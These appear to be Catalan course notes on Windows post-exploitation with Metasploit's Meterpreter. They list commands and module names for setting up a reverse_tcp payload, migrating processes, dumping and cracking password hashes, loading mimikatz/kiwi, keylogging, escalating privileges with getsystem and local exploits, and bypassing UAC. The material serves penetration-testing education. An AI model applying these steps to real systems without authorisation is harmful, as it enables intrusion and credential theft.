Postexplotació amb metasploit a Windows

Meterpreter #

  • Payload avançat que fa servir DLL injection en memòria (windows)

  • Conté un interpret de comandes

  • Amplia les capacitat de post explotació de metasploit

  • Caracterísiques

    • Previngut
      • meterpreterresideix completament a la memòria de la víctima i no escriu a disc.
      • Fàcil migració de procés
      • Es comunica per defecte amb un canal xifrat dificultant la detecció
    • Extensible
      • Les capacitat es carreguen directament desde la xarxa
      • El payload es carrega més ràpid

  • Previament a l'ús de l'exploit hem de configurar meterpreter

use payload /
/meterpreter/reverse_tcp
set LHOST xxx.xxx.xxx.xxx

migrate #

  • Serveix per a moure una sessió de meterpreter a un procés

Cerca amb meterpreter #

  • Amb la comanda search es poden fer cerques

    • -h : help
    • -d -f : directory/fitxer permet expresions regulars

  • Per exemple

meterpreter > search -d c:/ -f  *.conf

Hashes #

hashdump #

  • L'ordre hashdump permet descarregar les hashes windows.
  • El mòdul auxiliary/analyze/jtr_crack_fast et permet fer atacs de diccionari directament sobre les hashes descarregades

mimikatz / kiwi #

  • mimikatz (ara kiwi a metasploit) és un aplicació per a descobrir contrasenyes
  • load kiwi : per carregar el modul desde meterpreter

Plugin espia #

  • Permet fer captures de pantalla o fer de keylogger

Shell #

  • Aquesta comanda et permet obrir un command prompt a la màquina víctima

Escalada de privilegis #

  • Podríem explotar una vulnerabilitat i tenir accés remot amb meterpreter però no tenir privilegis
  • Meterpreter ofereix la possibilitat d'escalar privilegis (windows : user a Administrator|System. Linux: user a root)

Camins #

  • Explorant vulnerabilitats del sistema
  • Erros de configuració del sistema
  • BD, web ..

user priv i getsystem #

  • Procés
    • Carregar l'extenció rpiv amb use priv
    • getsystem
    • getuid per verificar el nivell de privilegis. Es pot combinar amb sysinfo per a que t'informi de les dades del sistema

enumpatches #

  • post/windows/gather/enum_patches et mostra una llista de possibles "patches" vulnerables
  • Després només hauries de cercar i usar un exploit vàlid pel patch

exploit suggester #

  • post/multi/recon/local_exploit_suggester com el seu nom indica et suggereix exploits segons la plataforma i la versió
  • Un cop usat i explotat getsystem

Altres exploits: # 

- exploit/windows/local/m15_051_client_copy_image
- exploit/windows/local/ms10_015_kitrap0d
- exploit/windows/local/ms14_058_track_popup_menu
- exploit/windows/local/ms10_092_schelevator
- exploit/windows/local/ms16_016_webdav
- exploit/windows/local/pp3_flatten_rec
- exploit/windows/local/ms13_053_schlamperei


(...)

UAC #

  • UAC : User Account controller (Desde vista)
  • És un mòdul de seguretat que evita canvis no autoritzats al sistema.
  • Si un procés demana canvis de sistema UAC demana permís al administrador (a no ser que ja tingui privilegis d'administrador)
  • Sabrem que ens ha bloquejat UAC si després de fer getsystem (i getuid) no obtenim permisos d'administrador
Mòduls UAC # 
- exploit/windows/local/ask (altament efectiu)
- exploit/windows/local/bypassuac
- exploit/windows/local/bypassuac_injection
  • Hi ha més. Simplement busca UAC o bypassuac